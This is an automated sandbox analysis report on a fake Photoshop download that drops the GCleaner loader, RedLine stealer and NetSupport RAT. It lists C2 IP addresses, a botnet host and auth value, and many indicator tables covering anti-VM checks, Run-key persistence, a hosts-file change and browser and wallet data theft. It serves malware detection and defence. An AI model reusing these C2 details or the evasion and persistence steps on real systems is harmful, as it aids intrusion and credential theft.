gcleaner | 6291da8d2b59a7c884c01166d9012fd2940229e45f277aedfdb2e54463ecdbce

Analysis

max time kernel
616s
max time network
655s
platform
windows7_x64
resource
win7-20230621-en
resource tags

arch:x64arch:x86image:win7-20230621-enlocale:en-usos:windows7-x64system
submitted
27/06/2023, 12:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Download Photoshop 2022 3 rar.exe
Size

1.6MB
MD5

04214b463a60f638c7256b5b05f555c1
SHA1

390fad21fc6c45699b4fd58645b3dbcf80dc4861
SHA256

202883bd890c502446baa000acc68f8a0c3d6c5c1e3073300607d77b4981617d
SHA512

b37773854d1198f88d6f6072448ffc9a308d9ce983417b76ac072658786ba737ad96ad253fa91b17a1221235ff5339654e14a2d7a0a8b0513bf744f46c00cdda
SSDEEP

24576:s7FUDowAyrTVE3U5F/ba3Kic6QL3E2vVsjECUAQT45deRV9Rkw:sBuZrEUK3KIy029s4C1eH9T

Score

10^/10

gcleaner netsupport redline z discovery evasion infostealer loader persistence rat spyware stealer

Malware Config

Extracted

Family

gcleaner

45.12.253.56

45.12.253.72

45.12.253.98

45.12.253.75

Extracted

Family

redline

Botnet

n57b30a.info:81

Attributes

auth_value
907a217c291f74c1a111fc9371fe2803

Signatures

GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
loader gcleaner
NetSupport
NetSupport is a remote access tool sold as a legitimate system administration software.
rat netsupport
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	zazam.exe

Blocklisted process makes network request 64 IoCs

flow	pid	Process
81	2116	msiexec.exe
84	2908	MsiExec.exe
86	2908	MsiExec.exe
88	2908	MsiExec.exe
90	2908	MsiExec.exe
92	2908	MsiExec.exe
94	2908	MsiExec.exe
96	2908	MsiExec.exe
97	2908	MsiExec.exe
98	2908	MsiExec.exe
99	2908	MsiExec.exe
100	2908	MsiExec.exe
101	2908	MsiExec.exe
102	2908	MsiExec.exe
103	2908	MsiExec.exe
104	2908	MsiExec.exe
105	2908	MsiExec.exe
106	2908	MsiExec.exe
107	2908	MsiExec.exe
108	2908	MsiExec.exe
109	2908	MsiExec.exe
110	2908	MsiExec.exe
111	2908	MsiExec.exe
112	2908	MsiExec.exe
113	2908	MsiExec.exe
114	2908	MsiExec.exe
115	2908	MsiExec.exe
117	2908	MsiExec.exe
118	2908	MsiExec.exe
119	2908	MsiExec.exe
120	2908	MsiExec.exe
121	2908	MsiExec.exe
122	2908	MsiExec.exe
123	2908	MsiExec.exe
124	2908	MsiExec.exe
125	2908	MsiExec.exe
126	2908	MsiExec.exe
127	2908	MsiExec.exe
128	2908	MsiExec.exe
129	2908	MsiExec.exe
130	2908	MsiExec.exe
131	2908	MsiExec.exe
132	2908	MsiExec.exe
133	2908	MsiExec.exe
134	2908	MsiExec.exe
135	2908	MsiExec.exe
136	2908	MsiExec.exe
137	2908	MsiExec.exe
138	2908	MsiExec.exe
139	2908	MsiExec.exe
140	2908	MsiExec.exe
141	2908	MsiExec.exe
142	2908	MsiExec.exe
143	2908	MsiExec.exe
144	2908	MsiExec.exe
145	2908	MsiExec.exe
146	2908	MsiExec.exe
147	2908	MsiExec.exe
148	2908	MsiExec.exe
149	2908	MsiExec.exe
150	2908	MsiExec.exe
151	2908	MsiExec.exe
152	2908	MsiExec.exe
153	2908	MsiExec.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	DnsService.exe

Modifies Windows Firewall 1 TTPs 1 IoCs

evasion

Modify Existing Service

T1031

pid	Process
288	netsh.exe

Sets DLL path for service in the registry 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WUDFHostController\Parameters\ServiceDLL = "C:\\ProgramData\\Usoris\\Update\\msimg32.dll"	WUDFHost.exe

Checks BIOS information in registry 2 TTPs 2 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	zazam.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	zazam.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Adblock Fast.lnk	Adblock.exe

Executes dropped EXE 22 IoCs

pid	Process
1456	Download Photoshop 2022 3 rar.tmp
1648	setup.exe
924	setup.tmp
1600	s0.exe
1216	s0.tmp
572	wmiprvse.exe
1636	s1.exe
1152	s2.exe
2460	s3.exe
2536	zazam.exe
1296	1065961125.exe
468	7za.exe
3044	Silverlight.Configuration.exe
1980	WUDFHost.exe
1020	694862788.exe
1152	s4.exe
2492	s4.tmp
1628	Adblock.exe
1532	crashpad_handler.exe
1252	DnsService.exe
2072	s5.exe
2668	MassiveExtension.exe

Identifies Wine through registry keys 2 TTPs 1 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-4102714285-680558483-2379744688-1000\Software\Wine	zazam.exe

Loads dropped DLL 64 IoCs

pid	Process
1768	Download Photoshop 2022 3 rar.exe
1456	Download Photoshop 2022 3 rar.tmp
1456	Download Photoshop 2022 3 rar.tmp
1456	Download Photoshop 2022 3 rar.tmp
1456	Download Photoshop 2022 3 rar.tmp
1456	Download Photoshop 2022 3 rar.tmp
1648	setup.exe
924	setup.tmp
924	setup.tmp
924	setup.tmp
1600	s0.exe
1216	s0.tmp
1216	s0.tmp
572	wmiprvse.exe
572	wmiprvse.exe
572	wmiprvse.exe
572	wmiprvse.exe
572	wmiprvse.exe
572	wmiprvse.exe
924	setup.tmp
924	setup.tmp
924	setup.tmp
1152	s2.exe
1152	s2.exe
1152	s2.exe
2220	MsiExec.exe
2220	MsiExec.exe
2908	MsiExec.exe
2908	MsiExec.exe
2908	MsiExec.exe
2908	MsiExec.exe
2908	MsiExec.exe
2908	MsiExec.exe
2908	MsiExec.exe
2908	MsiExec.exe
2908	MsiExec.exe
1152	s2.exe
2908	MsiExec.exe
2908	MsiExec.exe
2908	MsiExec.exe
2800	MsiExec.exe
2908	MsiExec.exe
924	setup.tmp
1296	1065961125.exe
1296	1065961125.exe
468	7za.exe
1296	1065961125.exe
3044	Silverlight.Configuration.exe
3044	Silverlight.Configuration.exe
1980	WUDFHost.exe
1980	WUDFHost.exe
1980	WUDFHost.exe
1960	svchost.exe
2460	s3.exe
924	setup.tmp
1152	s4.exe
2492	s4.tmp
2492	s4.tmp
2492	s4.tmp
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe
1628	Adblock.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Unexpected DNS network traffic destination 1 IoCs

Network traffic to other servers than the configured DNS servers was detected on the DNS port.

description	ioc
Destination IP	9.9.9.9

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce	1065961125.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	1065961125.exe
Key created	\REGISTRY\USER\S-1-5-21-4102714285-680558483-2379744688-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	WUDFHost.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4102714285-680558483-2379744688-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Silverlight.Configuration.exe = "\"C:\\ProgramData\\Usoris\\Update\\Silverlight.Configuration.exe\""	WUDFHost.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\O:	s2.exe
File opened (read-only)	\??\S:	s2.exe
File opened (read-only)	\??\V:	s2.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\H:	s2.exe
File opened (read-only)	\??\M:	s2.exe
File opened (read-only)	\??\Z:	s2.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\A:	s2.exe
File opened (read-only)	\??\J:	s2.exe
File opened (read-only)	\??\P:	s2.exe
File opened (read-only)	\??\Q:	s2.exe
File opened (read-only)	\??\Y:	s2.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\B:	s2.exe
File opened (read-only)	\??\E:	s2.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\K:	s2.exe
File opened (read-only)	\??\R:	s2.exe
File opened (read-only)	\??\T:	s2.exe
File opened (read-only)	\??\W:	s2.exe
File opened (read-only)	\??\X:	s2.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\F:	s2.exe
File opened (read-only)	\??\G:	s2.exe
File opened (read-only)	\??\I:	s2.exe
File opened (read-only)	\??\N:	s2.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\L:	s2.exe
File opened (read-only)	\??\U:	s2.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\Q:	msiexec.exe

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat	WUDFHost.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

pid	Process
2536	zazam.exe

Drops file in Program Files directory 21 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\4QytSqXE3jI6 Limited Liability\ODISSDK.dll	s0.tmp
File opened for modification	C:\Program Files (x86)\4QytSqXE3jI6 Limited Liability\ConfigEngine.dll	s0.tmp
File created	C:\Program Files (x86)\4QytSqXE3jI6 Limited Liability\unins000.dat	s0.tmp
File created	C:\Program Files (x86)\4QytSqXE3jI6 Limited Liability\is-TRKEV.tmp	s0.tmp
File created	C:\Program Files (x86)\4QytSqXE3jI6 Limited Liability\is-UKMVK.tmp	s0.tmp
File created	C:\Program Files (x86)\4QytSqXE3jI6 Limited Liability\is-48BLA.tmp	s0.tmp
File created	C:\Program Files (x86)\Download Photoshop 2022 3 rar.exe\is-ABR0G.tmp	Download Photoshop 2022 3 rar.tmp
File opened for modification	C:\Program Files (x86)\Download Photoshop 2022 3 rar.exe\unins000.dat	Download Photoshop 2022 3 rar.tmp
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.ini	msiexec.exe
File created	C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe	msiexec.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url	msiexec.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url	msiexec.exe
File created	C:\Program Files (x86)\4QytSqXE3jI6 Limited Liability\is-UPO3C.tmp	s0.tmp
File created	C:\Program Files (x86)\4QytSqXE3jI6 Limited Liability\is-L8UJA.tmp	s0.tmp
File opened for modification	C:\Program Files (x86)\4QytSqXE3jI6 Limited Liability\cnpacnoc.dll	s0.tmp
File created	C:\Program Files (x86)\AW Manager\Windows Manager\Uninstall.lnk	msiexec.exe
File opened for modification	C:\Program Files (x86)\4QytSqXE3jI6 Limited Liability\mfcm140.dll	s0.tmp
File created	C:\Program Files (x86)\4QytSqXE3jI6 Limited Liability\is-F0IKH.tmp	s0.tmp
File opened for modification	C:\Program Files (x86)\4QytSqXE3jI6 Limited Liability\unins000.dat	s0.tmp
File created	C:\Program Files (x86)\Download Photoshop 2022 3 rar.exe\unins000.dat	Download Photoshop 2022 3 rar.tmp
File opened for modification	C:\Program Files (x86)\4QytSqXE3jI6 Limited Liability\DMReportSnapshot.dll	s0.tmp

Drops file in Windows directory 27 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Logs\DPX\setuperr.log	expand.exe
File opened for modification	C:\Windows\Installer\MSIC990.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC269.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICC81.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC1CB.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC279.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICB17.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICB28.tmp	msiexec.exe
File created	C:\Windows\Installer\6db8e8.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\6db8e6.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSICEF3.tmp	msiexec.exe
File created	C:\Windows\Installer\6db8e4.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC21A.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC7E8.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC951.tmp	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC4AC.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIC846.tmp	msiexec.exe
File opened for modification	C:\Windows\Logs\DPX\setupact.log	expand.exe
File opened for modification	C:\Windows\Installer\MSIC1AB.tmp	msiexec.exe
File created	C:\Windows\Installer\6db8e6.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\6db8e4.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSIBEFB.tmp	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Adblock.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	Adblock.exe

Gathers network information 2 TTPs 1 IoCs

Uses commandline utility to view network configuration.

System Information Discovery

T1082

Command-Line Interface

T1059

pid	Process
2804	ipconfig.exe

Kills process with taskkill 5 IoCs

evasion

pid	Process
1760	taskkill.exe
3008	taskkill.exe
2776	taskkill.exe
1040	taskkill.exe
1668	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 36 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-4102714285-680558483-2379744688-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4102714285-680558483-2379744688-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4102714285-680558483-2379744688-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4102714285-680558483-2379744688-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-4102714285-680558483-2379744688-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4102714285-680558483-2379744688-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4102714285-680558483-2379744688-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4102714285-680558483-2379744688-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4102714285-680558483-2379744688-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4102714285-680558483-2379744688-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4102714285-680558483-2379744688-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4102714285-680558483-2379744688-1000\Software\Microsoft\Internet Explorer\Main	Adblock.exe
Key created	\REGISTRY\USER\S-1-5-21-4102714285-680558483-2379744688-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4102714285-680558483-2379744688-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4102714285-680558483-2379744688-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4102714285-680558483-2379744688-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4102714285-680558483-2379744688-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000376c0b4d0fc806448c2c8b4fb3cdeabc000000000200000000001066000000010000200000008ca4010213ff3ab02a635d84c7e04f16d4ae60cb79fdf6aa024650b74c72e84c000000000e8000000002000020000000f3bc19e968a7eaac69a0d766ea4cd6e33d8a71873240c083e43592b30cecf74390000000767ee57d3c818eb44f78855925f922af25e75ed5f1a4851a9a7b10bd60d8f6f7ba39123b01f2be556c884c6f2da6669da373ce470da5f90391368601f4aae919392b24f09482872c448416418bd859805b3778d2a5d7b67d9b2a75cde2dce851bfcda1cff2cabd8e6ab1ec79f514bdc36947a8ae4e90f647b3a704c2b67baec16f7323dbe7eeeae7fd310c0fbabf1b8640000000543fecc4d561d2432e9d859197302e9e6805e19ca8eb6e1db6d6aa13000fb37c1ac75740bad1853a1dba05cc93f00f68d5e51a8a4043986d8261034cbc114f8e	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4102714285-680558483-2379744688-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4102714285-680558483-2379744688-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4102714285-680558483-2379744688-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4102714285-680558483-2379744688-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4102714285-680558483-2379744688-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4102714285-680558483-2379744688-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{A21579E1-14E9-11EE-AB65-CA5C11B4FBB1} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4102714285-680558483-2379744688-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4102714285-680558483-2379744688-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	IEXPLORE.EXE
Set value (data)	\REGISTRY\USER\S-1-5-21-4102714285-680558483-2379744688-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb01000000376c0b4d0fc806448c2c8b4fb3cdeabc000000000200000000001066000000010000200000003ceb3133c7e032825d87c58c06450d77f36604ea7ce70fa6dc1c9532e1589954000000000e80000000020000200000001ad1db86d255287f02acea122d33c871d2b1747251567546e3e9fe1187b9220c20000000532c0ceaeb7c4bc1786262f172a9286d07c78810b5a3bdea24875caa45b5e7f540000000654794e367626494aa7984c21a0230b5b53205e37c7a51dd227a32a17fdce309b7d44b8ca78fbd10a1fb3f95d755f7affc53c6af76b8fcf12779ef8322a1a10e	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-4102714285-680558483-2379744688-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 607f717af6a8d901	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4102714285-680558483-2379744688-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-4102714285-680558483-2379744688-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4102714285-680558483-2379744688-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4102714285-680558483-2379744688-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4102714285-680558483-2379744688-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4102714285-680558483-2379744688-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4102714285-680558483-2379744688-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-4102714285-680558483-2379744688-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-4102714285-680558483-2379744688-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1"	iexplore.exe

Modifies data under HKEY_USERS 28 IoCs

description	ioc	Process
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E\52C64B7E\@C:\Windows\system32\prnfldr.dll,-8036 = "Printers"	WUDFHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CF2B9C79-2680-4D57-B686-6EC697892545}\WpadDecisionTime = 90ca299cf6a8d901	WUDFHost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CF2B9C79-2680-4D57-B686-6EC697892545}\32-e8-ed-11-0e-9d	WUDFHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 70a72598f6a8d901	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f00b0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	WUDFHost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2e\52C64B7E	WUDFHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings	WUDFHost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CF2B9C79-2680-4D57-B686-6EC697892545}\WpadDecision = "0"	WUDFHost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D	msiexec.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	WUDFHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	WUDFHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e8-ed-11-0e-9d\WpadDecisionTime = 90ca299cf6a8d901	WUDFHost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e8-ed-11-0e-9d\WpadDecision = "0"	WUDFHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E\52C64B7E\@C:\Windows\SysWOW64\ieframe.dll,-5723 = "The Internet"	WUDFHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	WUDFHost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CF2B9C79-2680-4D57-B686-6EC697892545}\WpadDecisionReason = "1"	WUDFHost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000	WUDFHost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad	WUDFHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CF2B9C79-2680-4D57-B686-6EC697892545}\WpadNetworkName = "Network 3"	WUDFHost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e8-ed-11-0e-9d\WpadDecisionReason = "1"	WUDFHost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\32-e8-ed-11-0e-9d	WUDFHost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2E\52C64B7E\@C:\Windows\system32\NetworkExplorer.dll,-1 = "Network"	WUDFHost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings	WUDFHost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0"	WUDFHost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{CF2B9C79-2680-4D57-B686-6EC697892545}	WUDFHost.exe

Modifies registry class 24 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\C414548CC3098124D97E31A29BF7FD26	msiexec.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\C414548CC3098124D97E31A29BF7FD26\PackageCode = "B8DDBE5C483C5BC4A933A9E42F81D915"	msiexec.exe
